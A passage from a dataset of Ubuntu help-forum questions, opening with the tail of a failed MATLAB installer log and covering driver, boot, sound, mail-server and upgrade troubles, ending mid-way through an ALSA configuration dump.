/tmp/mathworks_2354/sys/java/jre/glnxa64/jre ( feb 17 , 2014 21:02:02 ) java version : 1.6.0_17 ( feb 17 , 2014 21:02:02 ) java vm name : java hotspot ( tm ) 64-bit server vm ( feb 17 , 2014 21:02:02 ) java class path : . ( feb 17 , 2014 21:02:02 ) user name : root ( feb 17 , 2014 21:02:02 ) current directory : /media/matlab ( feb 17 , 2014 21:02:02 ) input arguments : ( feb 17 , 2014 21:02:02 ) root /media/matlab ( feb 17 , 2014 21:02:02 ) tmpdir /tmp/mathworks_2354 ( feb 17 , 2014 21:02:02 ) standalone true ( feb 17 , 2014 21:02:04 ) starting local product/component search ( feb 17 , 2014 21:02:20 ) completed local product/component search ( feb 17 , 2014 21:37:58 ) default installation folder : /usr/local/matlab/r2013a ( feb 17 , 2014 21:38:26 ) default installation folder : /usr/local/matlab/r2013a ( feb 17 , 2014 21:41:01 ) default installation folder : /usr/local/matlab/r2013a ( feb 17 , 2014 21:41:05 ) starting local product/component search ( feb 17 , 2014 21:41:05 ) completed local product/component search ( feb 17 , 2014 21:41:48 ) confirmation text : installation folder : /usr/local/matlab/r2013a products : license manager 11.11 matlab 8.1 simulink 8.1 bioinformatics toolbox 4.3 communications system toolbox 5.4 control system toolbox 9.5 curve fitting toolbox 3.3.1 dsp system toolbox 8.4 financial toolbox 5.1 fixed-point designer 4.0 fuzzy logic toolbox 2.2.17 global optimization toolbox 3.2.3 image processing toolbox 8.2 instrument control toolbox 3.3 mapping toolbox 3.7 matlab coder 2.4 matlab compiler 4.18.1 neural network toolbox 8.0.1 optimization toolbox 6.3 parallel computing toolbox 6.2 partial differential equation toolbox 1.2 signal processing toolbox 6.19 simevents 4.3 simmechanics 4.2 simpowersystems 5.8 simscape 3.9 simulink 3d animation 6.3 simulink coder 8.4 simulink control design 3.7 stateflow 8.1 statistics toolbox 8.2 symbolic math toolbox 5.10 wavelet toolbox 4.11 ( feb 17 , 2014 21:41:51 ) java.lang.nullpointerexception at com.mathworks.install.componentsizeaggregator.add ( componentsizeaggregator.java:13 ) at com.mathworks.install.productinstallerimpl.downloadproducts ( productinstallerimpl.java:93 ) at com.mathworks.install.productinstallerimpl.installproducts ( productinstallerimpl.java:58 ) at com.mathworks.install.installerimpl.install ( installerimpl.java:100 ) at com.mathworks.installwizard.model.installtask.execute ( installtask.java:46 ) at com.mathworks.installwizard.model.abstractbackgroundtask.call ( abstractbackgroundtask.java:82 ) at com.mathworks.installwizard.model.abstractbackgroundtask.call ( abstractbackgroundtask.java:26 ) at com.mathworks.wizard.worker.workerimpl.doinbackground ( workerimpl.java:24 ) at javax.swing.swingworker $ 1.call ( unknown source ) at java.util.concurrent.futuretask $ sync.innerrun ( unknown source ) at java.util.concurrent.futuretask.run ( unknown source ) at javax.swing.swingworker.run ( unknown source ) at java.util.concurrent.threadpoolexecutor $ worker.runtask ( unknown source ) at java.util.concurrent.threadpoolexecutor $ worker.run ( unknown source ) at java.lang.thread.run ( unknown source ) ( feb 17 , 2014 21:41:51 ) error : the application encountered an unexpected error and needs to close . you may want to try re-installing your product ( s ) . more information can be found at /tmp/mathworks_root.log ( feb 17 , 2014 21:41:55 ) exiting with status -1 ( feb 17 , 2014 21:41:55 ) end - unsuccessful ( feb 17 , 2014 21:49:58 ) # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ( feb 17 , 2014 21:49:58 ) # ( feb 17 , 2014 21:49:58 ) # today 's date : ( feb 17 , 2014 21:49:58 ) mon feb 17 21:49:56 ist 2014 ( feb 17 , 2014 21:49:58 ) ( feb 17 , 2014 21:49:58 ) system info ( feb 17 , 2014 21:49:58 ) os : linux 3.11.0-15-generic ( feb 17 , 2014 21:49:58 ) arch : amd64 ( feb 17 , 2014 21:49:58 ) data model : 64 ( feb 17 , 2014 21:49:58 ) language : en ( feb 17 , 2014 21:49:58 ) java vendor : sun microsystems inc. ( feb 17 , 2014 21:49:58 ) java home : /tmp/mathworks_5054/sys/java/jre/glnxa64/jre ( feb 17 , 2014 21:49:58 ) java version : 1.6.0_17 ( feb 17 , 2014 21:49:58 ) java vm name : java hotspot ( tm ) 64-bit server vm ( feb 17 , 2014 21:49:58 ) java class path : . ( feb 17 , 2014 21:49:58 ) user name : root ( feb 17 , 2014 21:49:58 ) current directory : /mnt ( feb 17 , 2014 21:49:58 ) input arguments : ( feb 17 , 2014 21:49:58 ) root /mnt ( feb 17 , 2014 21:49:58 ) tmpdir /tmp/mathworks_5054 ( feb 17 , 2014 21:49:58 ) standalone true ( feb 17 , 2014 21:50:00 ) starting local product/component search ( feb 17 , 2014 21:50:16 ) completed local product/component search ( feb 17 , 2014 21:50:35 ) default installation folder : /usr/local/matlab/r2013a ( feb 17 , 2014 21:50:39 ) starting local product/component search ( feb 17 , 2014 21:50:39 ) completed local product/component search ( feb 17 , 2014 21:51:11 ) confirmation text : installation folder : /usr/local/matlab/r2013a products : license manager 11.11 matlab 8.1 simulink 8.1 bioinformatics toolbox 4.3 communications system toolbox 5.4 control system toolbox 9.5 curve fitting toolbox 3.3.1 dsp system toolbox 8.4 financial toolbox 5.1 fixed-point designer 4.0 fuzzy logic toolbox 2.2.17 global optimization toolbox 3.2.3 image processing toolbox 8.2 instrument control toolbox 3.3 mapping toolbox 3.7 matlab coder 2.4 matlab compiler 4.18.1 neural network toolbox 8.0.1 optimization toolbox 6.3 parallel computing toolbox 6.2 partial differential equation toolbox 1.2 signal processing toolbox 6.19 simevents 4.3 simmechanics 4.2 simpowersystems 5.8 simscape 3.9 simulink 3d animation 6.3 simulink coder 8.4 simulink control design 3.7 stateflow 8.1 statistics toolbox 8.2 symbolic math toolbox 5.10 wavelet toolbox 4.11 ( feb 17 , 2014 21:51:13 ) java.lang.nullpointerexception at com.mathworks.install.componentsizeaggregator.add ( componentsizeaggregator.java:13 ) at com.mathworks.install.productinstallerimpl.downloadproducts ( productinstallerimpl.java:93 ) at com.mathworks.install.productinstallerimpl.installproducts ( productinstallerimpl.java:58 ) at com.mathworks.install.installerimpl.install ( installerimpl.java:100 ) at com.mathworks.installwizard.model.installtask.execute ( installtask.java:46 ) at com.mathworks.installwizard.model.abstractbackgroundtask.call ( abstractbackgroundtask.java:82 ) at com.mathworks.installwizard.model.abstractbackgroundtask.call ( abstractbackgroundtask.java:26 ) at com.mathworks.wizard.worker.workerimpl.doinbackground ( workerimpl.java:24 ) at javax.swing.swingworker $ 1.call ( unknown source ) at java.util.concurrent.futuretask $ sync.innerrun ( unknown source ) at java.util.concurrent.futuretask.run ( unknown source ) at javax.swing.swingworker.run ( unknown source ) at java.util.concurrent.threadpoolexecutor $ worker.runtask ( unknown source ) at java.util.concurrent.threadpoolexecutor $ worker.run ( unknown source ) at java.lang.thread.run ( unknown source ) ( feb 17 , 2014 21:51:13 ) error : the application encountered an unexpected error and needs to close . you may want to try re-installing your product ( s ) . more information can be found at /tmp/mathworks_root.log ( feb 17 , 2014 21:51:21 ) exiting with status -1 ( feb 17 , 2014 21:51:22 ) end - unsuccessful ( feb 18 , 2014 08:09:12 ) # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ( feb 18 , 2014 08:09:12 ) # ( feb 18 , 2014 08:09:12 ) # today 's date : ( feb 18 , 2014 08:09:12 ) tue feb 18 08:09:12 ist 2014 ( feb 18 , 2014 08:09:12 ) ( feb 18 , 2014 08:09:12 ) system info ( feb 18 , 2014 08:09:12 ) os : linux 3.11.0-15-generic ( feb 18 , 2014 08:09:12 ) arch : amd64 ( feb 18 , 2014 08:09:12 ) data model : 64 ( feb 18 , 2014 08:09:12 ) language : en ( feb 18 , 2014 08:09:12 ) java vendor : sun microsystems inc. ( feb 18 , 2014 08:09:12 ) java home : /tmp/mathworks_10230/sys/java/jre/glnxa64/jre ( feb 18 , 2014 08:09:12 ) java version : 1.6.0_17 ( feb 18 , 2014 08:09:12 ) java vm name : java hotspot ( tm ) 64-bit server vm ( feb 18 , 2014 08:09:12 ) java class path : . ( feb 18 , 2014 08:09:12 ) user name : root ( feb 18 , 2014 08:09:12 ) current directory : /mnt ( feb 18 , 2014 08:09:12 ) input arguments : ( feb 18 , 2014 08:09:12 ) root /mnt ( feb 18 , 2014 08:09:12 ) tmpdir /tmp/mathworks_10230 ( feb 18 , 2014 08:09:12 ) standalone true ( feb 18 , 2014 08:09:15 ) starting local product/component search ( feb 18 , 2014 08:09:30 ) completed local product/component search ( feb 18 , 2014 08:09:57 ) default installation folder : /usr/local/matlab/r2013a ( feb 18 , 2014 08:10:05 ) starting local product/component search ( feb 18 , 2014 08:10:05 ) completed local product/component search ( feb 18 , 2014 08:10:51 ) confirmation text : installation folder : /usr/local/matlab/r2013a products : license manager 11.11 matlab 8.1 simulink 8.1 bioinformatics toolbox 4.3 communications system toolbox 5.4 control system toolbox 9.5 curve fitting toolbox 3.3.1 dsp system toolbox 8.4 financial toolbox 5.1 fixed-point designer 4.0 fuzzy logic toolbox 2.2.17 global optimization toolbox 3.2.3 image processing toolbox 8.2 instrument control toolbox 3.3 mapping toolbox 3.7 matlab coder 2.4 matlab compiler 4.18.1 neural network toolbox 8.0.1 optimization toolbox 6.3 parallel computing toolbox 6.2 partial differential equation toolbox 1.2 signal processing toolbox 6.19 simevents 4.3 simmechanics 4.2 simpowersystems 5.8 simscape 3.9 simulink 3d animation 6.3 simulink coder 8.4 simulink control design 3.7 stateflow 8.1 statistics toolbox 8.2 symbolic math toolbox 5.10 wavelet toolbox 4.11 ( feb 18 , 2014 08:10:53 ) java.lang.nullpointerexception at com.mathworks.install.componentsizeaggregator.add ( componentsizeaggregator.java:13 ) at com.mathworks.install.productinstallerimpl.downloadproducts ( productinstallerimpl.java:93 ) at com.mathworks.install.productinstallerimpl.installproducts ( productinstallerimpl.java:58 ) at com.mathworks.install.installerimpl.install ( installerimpl.java:100 ) at com.mathworks.installwizard.model.installtask.execute ( installtask.java:46 ) at com.mathworks.installwizard.model.abstractbackgroundtask.call ( abstractbackgroundtask.java:82 ) at com.mathworks.installwizard.model.abstractbackgroundtask.call ( abstractbackgroundtask.java:26 ) at com.mathworks.wizard.worker.workerimpl.doinbackground ( workerimpl.java:24 ) at javax.swing.swingworker $ 1.call ( unknown source ) at java.util.concurrent.futuretask $ sync.innerrun ( unknown source ) at java.util.concurrent.futuretask.run ( unknown source ) at javax.swing.swingworker.run ( unknown source ) at java.util.concurrent.threadpoolexecutor $ worker.runtask ( unknown source ) at java.util.concurrent.threadpoolexecutor $ worker.run ( unknown source ) at java.lang.thread.run ( unknown source ) ( feb 18 , 2014 08:10:53 ) error : the application encountered an unexpected error and needs to close . you may want to try re-installing your product ( s ) . more information can be found at /tmp/mathworks_root.log ( feb 18 , 2014 08:12:51 ) exiting with status -1 ( feb 18 , 2014 08:12:51 ) end - unsuccessful
422413	print pdf file shows up as garbage	i 'm trying to print several pdf files exported from google docs . when i open them in document viewer , hit ctrl+p and select my printer , it spews out several pages of garbage which appear to be the raw code of the file ( it starts with % pdf ) . what 's the problem here ? is there any fix , or at least a workaround ?
422415	ubuntu 13.10 upgrade failed	i had ubuntu 13.04 dual booted with windows 7 . i tried to upgrade to 13.10 using the software manager . however after the downloading stage i.e . fetching new packages my system shutdown somehow and the process was not complete . after having restarted it i am not able to access my hard drive through ubuntu and neither am i able to open any applications . when i check the about this computer it says that i have ubuntu 13.10 . i try opening the applications using alt-f2 but every application i open crashes after some time . so is there any way to complete the upgrade process ? i 'm new to ubuntu so have very little idea .
422416	`` missing operateing system '' macbookpro triple boot troubles	( this was posted on february 17th 2014 ) **my actual question is at the bottom under the other double asterisks the rest is a fairly detailed account of what i have done so far . thanks ! ! : d hey folks i 'm having some issues triple booting my mbp via refind so here 's the long and short of it . specs ; mid 2010 mbp , modle identifier ( aka generation ) 7.1 , running os 10.8.3 mountain lion with refind efi boot loader . you may notice i 'm not on os mavericks i 've stopped upgrading apple software because i 'm tired of apple deciding what i can and ca n't do ... any way october 2013 i decided to try a triple boot i found a guide @ http : //lifehacker.com/5531037/how-to-triple+boot-your-mac-with-windows-and-linux-no-boot-camp-required this guide was a little dated from 2010 and guides you through the process of triple booting os 10.7.x lion , ubuntu 10.04 , windows 7 . i installed refit at first then xubuntu ( i 'm not sure what version ) at the time i had never used linux and knew nothing about it , i installed xubuntu because a friend recommended it over ubuntu , he happend to have an bootable flash drive of it ( *made on linux live in windows ) and i installed it right then and there . then windows 7 via cd . bam , sweet ! i had , 3 operating systems on my computer the problem was the wifi drivers in xubuntu wouldent work . it took me a couple of weeks but i finally found and installed the drivers and as soon as i did xubuntu told me i had updates i went ahead with them , and the wifi drivers that i had installed , ceased to function along with a whole host of other compatibility issues . ( i 'm not sure about this but i think it updated to 13.4 i did n't know at the time that there would be compatibility issues between releases and my hardware it turns out that 13.4 is not supported well on mbp 7.1 ) so i uninstalled xubuntu and took a break and fiddled with windows and reinstalled windows several times for different reasons . ultimately i made a linux live bootable usb with xubuntu 12.04.3 lts and tried to install it but every time i tried to install it , it would boot directly into windows i tried several work abounds but nothing worked . then i had the thought that maybe it would work if i installed xubuntu 12.04.3 first so i deleted my windows partition and restarted my system and xubuntu installed fine , wifi drivers and all : d hazah i said at last success . all that was left was to reinstall windows7 ( something i had already done 3-4 times ) however ... this brings us up to the problem i am currently facing , which is ... ** when i try to install windows i get a message that says missing operating system . does any one know anything about this , or have any resources on troubleshooting refind . thanks
422421	how can i adjust the speed of my scroll wheel in saucy ?	for some reason , my mouse scroll-wheel speed is noticeably slower than on any other operating system i 've used . i looked in the system settings gui and i have n't found anything of use . normally in windows and mac os x you can find a scroll speed slider in the mouse settings , and i 've noticed ubuntu is slowly phasing out most of its ' settings . is there a terminal command or a code chunk i can throw in a config file ?
422422	how much memory is free ?	how much memory is free ? from my understanding i have 1gb of memory , and it says free is 71mb ? but why does it say that i have 536 free in buffers ? so am i really using all my ram or not ? total used free shared buffers cached mem : 994 923 71 0 111 352 -/+ buffers/cache : 458 536 swap : 0 0 0
422423	110gb syslog , kernel log files filled by `` tty_port_close_start : count = -1 ''	i 'm running ubuntu 12.04 . when i sat down at my computer this morning i got a warning message telling me that i had 7mb of free hard disk space . when i went to bed last night , i had > 200gb of free space , so this was a surprise . i looked at the file system and found two enormous files : /var/log/syslog.1 : 110gb /var/log/kern.log : 110gb the following message was written probably millions of times to both files : tty_port_close_start : count = -1 does anyone have any insight into what could be causing this . i 'm not sure what i need to do to prevent this from happening again . thanks for the help
422424	postfix configuration check	i have n't been able to get port 25 open on my public ip address when i run the postfix server on that port . i 've called my isp and requested that it be open , which it is , on my local network only . i have selinux enabled too , and thought that could be a problem in my firewall settings , but since then i have customized iptables so that there should be no problems getting connections from outside the local network . i am also behind a nat firewall on my router , which could be another likely cause of the conflict . could someone please look over the configuration file and see what i 'm doing wrong so far : /etc/postfix/main.cf : smtpd_banner = $ myhostname esmtp $ mail_name ( ubuntu ) biff = no append_dot_mydomain = no readme_directory = no smtpd_tls_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem smtpd_tls_key_file=/etc/ssl/private/ssl-cert-snakeoil.key smtpd_use_tls=no smtpd_tls_session_cache_database = btree : $ { data_directory } /smtpd_scache smtp_tls_session_cache_database = btree : $ { data_directory } /smtp_scache smtpd_relay_restrictions = permit_mynetworks permit_sasl_authenticated defer_unauth_destination myhostname = server.admitonetwowire.com alias_maps = hash : /etc/aliases alias_database = hash : /etc/aliases mydestination = admitonetwowire.com , admitonetwowire.com. , localhost.localdomain , localhost relayhost = all mynetworks = all mailbox_size_limit = 0 recipient_delimiter = + inet_interfaces = all
422426	ca n't get an nvidia driver to work 12.04	i 've been tearing my hair out trying to get an nvidia driver for my gtx650-ti to install and work . after a clean install of 12.04 , installing the driver from `` additional drivers '' and installing with apt-get install nvidia-current both result in my install booting , but not being able to log in . there is so much material on installing nvidia drivers , but nothing seems to work for me . what is going on ?
422427	screen locking does not work after upgrade	i 'm using xscreensaver . i replaced gnome-screensaver with it . made such link : sudo ln -s /usr/bin/xscreensaver-command /usr/bin/gnome-screensaver-command however , hitting ctrl+alt+l does nothing even after i replaced actual command . but running xscreensaver-command -lock inside terminal locks screen fine . any ideas ?
422432	problems in installing ubuntu 12.04	how do i open an .iso file ( firefox wo n't work ) ? why is n't what i downloaded to install ubuntu an executable file ?
422435	running ubuntu on 16gb thumb drive	i 'm brand new- an ubuntu convert- and i 've been able to so far figure out how to burn the os onto a dvd , and also how i can get it onto a thumb drive . i 've even gotten it to work on both . however , what i am concerned with is this : can i continue to run ubuntu only via my thumb drive , and if so , when i get the screen telling me i can either `` try ubuntu '' or install it , which do i choose ? i 've only done the former option , but if i do the latter , am i going to wipe my comp or will it actually only install on the thumb drive ? i guess i 'm wondering if i can treat my thumb drive like an external hard drive and just have it on there , so that i can use it when i want and then go back to my other os when it 's not plugged in . thanks for your help , all . hopefully i 'm making enough sense that you guys/gals know what i 'm asking .
422437	what can resolve my hardware issues with linux 3.11.0-15 in saucy salimander ?	okay , newb here , so be a bit gentle , please . i recently installed ubuntu 13.10 over my 12.04 lts partion ( saving home folder ) and booted it up to discover my cursor had disappeared , my mouse touchpad undetected , my graphic acceleration reduced greatly , my processor running at full 100 percent load , and everything sluggishly crawling , which is a far cry from the beauty linux and ubuntu has proven to be in the past . i restarted , then from the advanced settings in grub , selected ubuntu with linux 3.11.0-12 from the menu and it worked like a charm ! so now , how can i either set this kernel to boot defaultly or fix the errors with the newer kernel ?
422440	how do i add a virtualbox host-only networking interface to the network manager in xubuntu 13.10 ?	i created a virtual machine to basically act as a bridge to the internet for the host of the virtual machine , but i want the host-only interface that 's attached to the host to be configurable in the network manager and so it does n't act like i do n't have a connection at all . since the interface is n't a physical interface , it does n't just let me add an `` ethernet '' connection and choose the device , and i ca n't find any kind of add-on package for the network manager that does this like with openvpn . how can i add the host-only interface to the network manager ? to those who marked my question as a duplicate to `` in virtualbox , how do i set up host-only virtual machines that can access the internet ? `` : this is not my question . if you would read like you 're supposed to you would see that my question is about host-only interface support in host os 's ( xubuntu 13.10 ) network manager , as in the built in one , virtualbox 's manager does not allow me to set a default gateway , so even if i do it manually with the route command , it gets wiped on the next network change such as connecting to wifi . i want to access the configuration through the network manager instead of virutalbox for a reason , and that is it . i did not ask how to connect my virtual machine to the internet !
422443	backspace key for back/forward in a open window	i wish to use the backspace key to go back/forward in a open window just like it is in windows . i wish to create a shortcut for `` go to previous/next visited location '' in an opened window . how can i do this ?
422445	where is the browserloadurl file in firefox directory in linux ?	i am unable to find the browserloadurl file in firefox directory . i want to disable file protocol .
422452	install ubuntu from usb drive	i have a laptop with no cd/dvd drive . i want to remove win 8 and put ubuntu instead . i am not sure if there is uefi in this laptop ( its the cheapest ) . i do n't want to buy a usb optical drive just for this . is there a reliable and easy way to install ubuntu from a usb drive onto my new laptop ? i tried to install it on an external hard drive , but i saw no boot options . so , i got a new cheap laptop instead . again , i am stuck . is it really this hard to install ubuntu via usb ?
422453	how to make image backup ( .iso ) and install same in another system ?	i am using kali linux.i want to setup my personnel infosec research lab wit 3 system . one of my system has important files and and it has updated daily basis . i want to make image copy of my entier kali linux along with files and folders and updates to install other 2 system . it will help me to avoid to install the os again and copy the folders and files and avoid updates also . is there any options available for this . please guide me . i have reviewed some imaging tools but i could n't succeed .
422457	how to recover from an package uninstallation that removed everything ?	i am using 13.10 in vmware as a guest . while trying to remove an older version of libjpeg using apt-get , somehow , the whole desktop and related applications were removed . i have rebooted into recovery mode and it has attempted to mount my disks . however , it gets stuck during the loading of services . it 's now showing something like below and just sits there : * starting elasticsearch server [ ok ] new development : i have gotten into the root shell with network enabled . sudo apt-get update was also run . now , when i go and do sudo apt-get install -- reinstall ubuntu-desktop it lists a bunch of dependencies , but says they will not be installed . therefore , since dependencies were not met , install could not proceed : if i run sudo apt-get check , i also get the same output . what can be done to resolve this ? i do not want to do apt-get -f install yet without understanding the implications .
422458	how do i enlarge the icons in the firefox bookmarks-bar ?	i have a small 13inch screen with a resolution of 3200x1800px . now i can change the default font-size with the addon nosquint , but the icons in firefox are still tiny . how do i change the icon size ?
422459	disable prtscr+alt gr+e , accidentally killing session	when i press the key combination : altr gr + prtscr + e my session gets killed , either x or a tty . i discovered this by ( repeated ) accident ... this was not an issue for me before . my current laptop ( lenovo x230 ) has the prtscr key besides the right alt key rather than on the top right section of the keyboard , so i accidentally press them both sometimes . standard keyboard layout lenovo x230 , t430s keyboard layout how do i disable it ? thanks !
422461	ubuntu 13.10 sound	i 'm new to ubuntu and i 'm having some issues with my install . i 've gone through every step that i can find to fix sounds issues including asla reload , alsa reinstall , manually unmuting the asla mixer , updating the sound drivers , and editing the speech-dispatcher file . nothing seems to work . i tried to manually installing drivers from the msi website for my motherboard , but they only have windows supported versions . i went to the realtek website to try to find drivers , but the driver i downloaded had instructions for updating the kernel and i think this may be a bit above my head ... if anyone has any insight at all i would really appreciate it as my computer is working great and i really like ubuntu so far - except for the fact that i have no sound . the motherboard is an msi fm2-a75ia-e53 . msi website i installed ubuntu and experienced no sound . i 've had a few issues with this particular motherboard having no sound through the hdmi cord in the past , but i have an optical cable that has had no issues in windows . i tested headphones and i can get sound , but i can not successfully get sound through any other output . i tried a few different walk throughs that i found in forums and could n't seem to get sound working . this forum post contains the majority of my troubleshooting steps that i mentioned going through in my initial post . below are my recognized sound cards . in alsamixer i see my soundcards , but my ati hdmi configureations have four channels and wo n't let me raise the volume on any . the the hd-audio generic wo n't let me raise the volume on the optical output ( s/pdif ) and when i unmute it the channel automatically goes back to mute . also , on a side note the volume on a few other channels seems to change by a few points on their own back and forth continuously . lastly , i read that switching the 'iec958 playback switch ' value to true in the asound config file could fix the problem , but when i when into the file it appeared to already be set to true ( see config file at bottom for details ) . state.hdmi { control.1 { iface card name 'hdmi/dp , pcm=3 jack' value false comment { access read type boolean count 1 } } control.2 { iface mixer name 'iec958 playback con mask' value '0fff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' comment { access read type iec958 count 1 } } control.3 { iface mixer name 'iec958 playback pro mask' value '0f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' comment { access read type iec958 count 1 } } control.4 { iface mixer name 'iec958 playback default' value '0400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' comment { access 'read write' type iec958 count 1 } } control.5 { iface mixer name 'iec958 playback switch' value true comment { access 'read write' type boolean count 1 } } control.6 { iface pcm device 3 name eld value '' comment { access 'read volatile' type bytes count 0 } } control.7 { iface card name 'hdmi/dp , pcm=7 jack' value false comment { access read type boolean count 1 } } control.8 { iface mixer name 'iec958 playback con mask' index 1 value '0fff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' comment { access read type iec958 count 1 } } control.9 { iface mixer name 'iec958 playback pro mask' index 1 value '0f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' comment { access read type iec958 count 1 } } control.10 { iface mixer name 'iec958 playback default' index 1 value '0400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' comment { access 'read write' type iec958 count 1 } } control.11 { iface mixer name 'iec958 playback switch' index 1 value true comment { access 'read write' type boolean count 1 } } control.12 { iface pcm device 7 name eld value '' comment { access 'read volatile' type bytes count 0 } } control.13 { iface card name 'hdmi/dp , pcm=8 jack' value false comment { access read type boolean count 1 } } control.14 { iface mixer name 'iec958 playback con mask' index 2 value '0fff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' comment { access read type iec958 count 1 } } control.15 { iface mixer name 'iec958 playback pro mask' index 2 value '0f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' comment { access read type iec958 count 1 } } control.16 { iface mixer name 'iec958 playback default' index 2 value '0400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' comment { access 'read write' type iec958 count 1 } } control.17 { iface mixer name 'iec958 playback switch' index 2 value true comment { access 'read write' type boolean count 1 } } control.18 { iface pcm device 8 name eld value '' comment { access 'read volatile' type bytes count 0 } } control.19 { iface card name 'hdmi/dp , pcm=9 jack' value false comment { access read type boolean count 1 } } control.20 { iface mixer name 'iec958 playback con mask' index 3 value '0fff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' comment { access read type iec958 count 1 } } control.21 { iface mixer name 'iec958 playback pro mask' index 3 value '0f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' comment { access read type iec958 count 1 } } control.22 { iface mixer name 'iec958 playback default' index 3 value '0400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000' comment { access 'read write' type iec958 count 1 } } control.23 { iface mixer name 'iec958 playback switch' index 3 value true comment { access 'read write' type boolean count 1 } } control.24 { iface pcm device 9 name eld value '' comment { access 'read volatile' type bytes count 0 } } control.25 { iface pcm device 3 name 'playback channel map' value.0 0 value.1 0 comment { access 'read write' type integer count 2 range '0 - 36' } } control.26 { iface pcm device 7 name 'playback channel map' value.0 0 value.1 0 comment { access 'read write' type integer count 2 range '0 - 36' } } control.27 { iface pcm device 8 name 'playback channel map' value.0 0 value.1 0 comment { access 'read write' type integer count 2 range '0 - 36' } } control.28 { iface pcm device 9 name 'playback channel map' value.0 0 value.1 0 comment { access 'read write' type integer count 2 range '0 - 36' } } } state.generic { control.1 { iface mixer name 'channel mode' value '2ch' comment { access 'read write' type enumerated count 1 item.0 '2ch' item.1 '4ch' item.2 '6ch' } } control.2 { iface mixer name 'front playback volume' value.0 64 value.1 64 comment { access 'read write' type integer count 2 range '0 - 64' dbmin -6400 dbmax 0 dbvalue.0 0 dbvalue.1 0 } } control.3 { iface mixer name 'front playback switch' value.0 true value.1 true comment { access 'read write' type boolean count 2 } } control.4 { iface mixer name 'surround playback volume' value.0 64 value.1 64 comment { access 'read write' type integer count 2 range '0 - 64' dbmin -6400 dbmax 0 dbvalue.0 0 dbvalue.1 0 } } control.5 { iface mixer name 'surround playback switch' value.0 true value.1 true comment { access 'read write' type boolean count 2 } } control.6 { iface mixer name 'center playback volume' value 64 comment { access 'read write' type integer count 1 range '0 - 64' dbmin -6400 dbmax 0 dbvalue.0 0 } } control.7 { iface mixer name 'lfe playback volume' value 64 comment { access 'read write' type integer count 1 range '0 - 64' dbmin -6400 dbmax 0 dbvalue.0 0 } } control.8 { iface mixer name 'center playback switch' value true comment { access 'read write' type boolean count 1 } } control.9 { iface mixer name 'lfe playback switch' value true comment { access 'read write' type boolean count 1 } } control.10 { iface mixer name 'headphone playback volume' value.0 64 value.1 64 comment { access 'read write' type integer count 2 range '0 - 64' dbmin -6400 dbmax 0 dbvalue.0 0 dbvalue.1 0 } } control.11 { iface mixer name 'headphone playback switch' value.0 true value.1 true comment { access 'read write' type boolean count 2 } } control.12 { iface mixer name 'front mic playback volume' value.0 31 value.1 31 comment { access 'read write' type integer count 2 range '0 - 31' dbmin -3450 dbmax 1200 dbvalue.0 1200 dbvalue.1 1200 } } control.13 { iface mixer name 'front mic playback switch' value.0 true value.1 true comment { access 'read write' type boolean count 2 } } control.14 { iface mixer name 'rear mic playback volume' value.0 31 value.1 31 comment { access 'read write' type integer count 2 range '0 - 31' dbmin -3450 dbmax 1200 dbvalue.0 1200 dbvalue.1 1200 } } control.15 { iface mixer name 'rear mic playback switch' value.0 false value.1 false comment { access 'read write' type boolean count 2 } } control.16 { iface mixer name 'line playback volume' value.0 31 value.1 31 comment { access 'read write' type integer count 2 range '0 - 31' dbmin -3450 dbmax 1200 dbvalue.0 1200 dbvalue.1 1200 } } control.17 { iface mixer name 'line playback switch' value.0 true value.1 true comment { access 'read write' type boolean count 2 } } control.18 { iface mixer name 'auto-mute mode' value disabled comment { access 'read write' type enumerated count 1 item.0 disabled item.1 enabled } } control.19 { iface mixer name 'front mic boost volume' value.0 